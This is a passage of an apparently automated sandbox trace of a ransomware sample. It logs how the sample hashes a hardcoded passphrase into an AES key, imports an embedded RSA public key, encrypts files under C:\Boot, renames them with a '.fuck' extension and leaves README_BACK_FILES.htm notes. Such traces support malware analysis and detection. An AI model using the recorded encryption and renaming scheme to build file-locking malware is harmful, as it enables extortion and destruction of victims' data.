PublicKey.cbData=0x8c, PublicKey.pbData=0x275f448*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394028) returned 1 [0231.480] CryptEncrypt (in: hKey=0x394028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.480] CryptEncrypt (in: hKey=0x394028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276a678*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276a678*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.480] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276a678, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.480] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27782d8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.480] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.480] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.480] CloseHandle (hObject=0xffffffff) returned 1 [0231.480] CloseHandle (hObject=0xffffffff) returned 1 [0231.480] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), bFailIfExists=0) returned 0 [0231.481] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf", dwFileAttributes=0x0) returned 0 [0231.481] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.gsg")) returned 0 [0231.481] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.fuck" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.fuck")) returned 0 [0231.481] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.481] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.481] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.481] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.482] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.482] GetLastError () returned 0x5 [0231.482] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0231.482] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.483] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.483] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.483] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.483] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.485] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.485] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.486] CryptHashData (hHash=0x394be8, pbData=0x2ec760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.486] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.486] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.486] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.486] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276aa30) returned 1 [0231.486] CryptImportPublicKeyInfo (in: hCryptProv=0x276aa30, dwCertEncodingType=0x1, pInfo=0x2760520*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760550*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760558*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3940e8) returned 1 [0231.486] CryptEncrypt (in: hKey=0x3940e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.486] CryptEncrypt (in: hKey=0x3940e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276a2c0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276a2c0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.486] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276a2c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.486] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27782d8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.487] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.487] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.487] CloseHandle (hObject=0xffffffff) returned 1 [0231.487] CloseHandle (hObject=0xffffffff) returned 1 [0231.487] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), bFailIfExists=0) returned 0 [0231.487] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.487] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.gsg")) returned 0 [0231.487] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.fuck")) returned 0 [0231.488] CryptDestroyHash (hHash=0x394be8) returned 1 [0231.488] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.488] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.488] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.488] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.488] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fonts\\readme_back_files.htm")) returned 0x20 [0231.489] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.489] FindFirstFileA (in: lpFileName="C:\\\\Boot\\fr-CA\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394be8 [0231.489] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.489] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.489] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.489] GetLastError () returned 0x12 [0231.489] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui")) returned 0x20 [0231.490] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.490] CreateFileA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.490] CreateFileA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.491] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.491] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.493] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.493] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.493] CryptHashData (hHash=0x394d28, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.493] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x3949a8) returned 1 [0231.493] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.494] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.494] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276af80) returned 1 [0231.494] CryptImportPublicKeyInfo (in: hCryptProv=0x276af80, dwCertEncodingType=0x1, pInfo=0x275f750*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f780*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f788*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394268) returned 1 [0231.494] CryptEncrypt (in: hKey=0x394268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.494] CryptEncrypt (in: hKey=0x394268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b008*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b008*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.494] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b008, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.494] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.494] CryptEncrypt (in: hKey=0x3949a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.494] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.495] CloseHandle (hObject=0xffffffff) returned 1 [0231.495] CloseHandle (hObject=0xffffffff) returned 1 [0231.495] CopyFileA (lpExistingFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.495] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.495] DeleteFileA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.gsg")) returned 0 [0231.496] MoveFileA (lpExistingFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.fuck")) returned 0 [0231.496] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.496] CryptDestroyKey (hKey=0x3949a8) returned 1 [0231.496] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.496] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.496] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.496] FindClose (in: hFindFile=0x394be8 | out: hFindFile=0x394be8) returned 1 [0231.496] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fr-ca\\readme_back_files.htm")) returned 0x20 [0231.497] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.497] FindFirstFileA (in: lpFileName="C:\\\\Boot\\fr-FR\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.499] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.499] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.499] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.499] GetLastError () returned 0x12 [0231.499] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0231.499] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.500] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.500] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.500] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.500] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.502] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.502] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.503] CryptHashData (hHash=0x394a68, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.503] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.503] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.503] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.503] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a700) returned 1 [0231.503] CryptImportPublicKeyInfo (in: hCryptProv=0x276a700, dwCertEncodingType=0x1, pInfo=0x275f4e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f510*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f518*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3942e8) returned 1 [0231.503] CryptEncrypt (in: hKey=0x3942e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.503] CryptEncrypt (in: hKey=0x3942e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b338*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b338*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.504] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b338, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.505] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.505] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.505] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.505] CloseHandle (hObject=0xffffffff) returned 1 [0231.505] CloseHandle (hObject=0xffffffff) returned 1 [0231.505] CopyFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.505] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.505] DeleteFileA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.gsg")) returned 0 [0231.506] MoveFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.fuck")) returned 0 [0231.506] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.506] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.506] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.506] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.506] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.506] GetLastError () returned 0x5 [0231.506] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui")) returned 0x20 [0231.506] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.507] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.507] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.507] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.507] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.509] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.510] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.510] CryptHashData (hHash=0x394d28, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.510] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.510] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.510] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.510] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 